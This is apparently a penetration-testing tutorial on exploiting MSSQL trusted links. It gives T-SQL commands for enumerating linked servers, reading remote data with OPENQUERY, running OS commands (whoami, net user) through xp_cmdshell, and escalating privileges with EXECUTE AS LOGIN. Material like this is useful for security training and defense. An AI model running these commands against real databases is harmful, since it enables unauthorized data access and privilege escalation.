MSSQL Trusted Links

Context

This article explores the exploitation of MSSQL Trusted Links for unauthorized data access and potential command execution. The reader is assumed to have knowledge of SQL Server architecture, the configuration of linked servers, and SQL query execution.

Theory

Linked Servers in MSSQL

Linked servers in Microsoft SQL Server allow an instance to interact with data sources beyond its boundaries through its support for OLE DB. This functionality facilitates seamless cross-database queries and operations, allowing different databases to communicate and exchange data efficiently.

MSSQL Trusted Links are grounded in the assumption that there is inherent trust between the communicating SQL Server instances. These linkages, if misconfigured, can potentially lead to vulnerabilities, allowing attackers to bypass standard authentication protocols and gain unauthorized access to data.

Security Context Impersonation

Security context impersonation is a function where SQL Server can assume the identity of a trusted connection's security context. When mismanaged, this can be exploited to escalate privileges, providing attackers with the means to access or manipulate sensitive data and operations otherwise restricted.

Cross-Database Access via Linked Servers

A fundamental attack sequence involves using a linked server to execute queries or commands on a remote database. The main weakness here lies in the lack of stringent access controls, often leading to unauthorized data access if improperly configured.

Practice

  • Identify Linked Servers:
    Use the master..sysservers table to identify all the linked servers configured in the target SQL Server instance.

    SELECT * FROM master..sysservers;

  • List Linked Servers:
    Employ the stored procedure sp_linkedservers to enumerate all linked servers, helping identify potential targets.

    EXEC sp_linkedservers;

  • Access Data from Linked Server:
    Retrieve information from a database within a linked server using OPENQUERY. This allows data access without having direct permissions on the target server.

    SELECT * FROM OPENQUERY([LinkedServerName], 'SELECT * FROM target_db.dbo.target_table');

  • Execute Commands on Linked Server:
    Use xp_cmdshell to run commands, such as whoami, on the linked server to confirm access levels or gather more information.

    EXEC('xp_cmdshell ''whoami''') AT [LinkedServerName];

    Outcome: This technique enables unauthorized access to data hosted on linked servers, bypassing direct permissions.

Privilege Escalation via Security Context Impersonation

  • Impersonate a Higher Privilege Login:
    Leverage EXECUTE AS LOGIN to impersonate a login with elevated privileges.

    EXECUTE AS LOGIN = 'linked_server_login';

  • Access Data Using Impersonation:
    Through impersonation, query sensitive data from the linked server.

    SELECT * FROM OPENQUERY([LinkedServerName], 'SELECT * FROM sensitive_db.dbo.sensitive_table');

  • Execute Privileged Commands:
    Utilize xp_cmdshell to execute privileged commands, such as checking user accounts, on the linked server under the impersonated security context.

    EXEC('xp_cmdshell ''net user''') AT [LinkedServerName];

    Outcome: This approach results in privilege escalation, enabling the attacker to perform tasks beyond their original access level using impersonated privileges.

Tools

  • SQL Server Management Studio
  • sqlcmd

By following the above techniques, an attacker can exploit trust relationships in linked MSSQL servers to execute unauthorized commands, access sensitive data, and elevate their privilege within the network.

We use cookies

We use cookies to ensure you get the best experience on our website. For more information on how we use cookies, please see our cookie policy.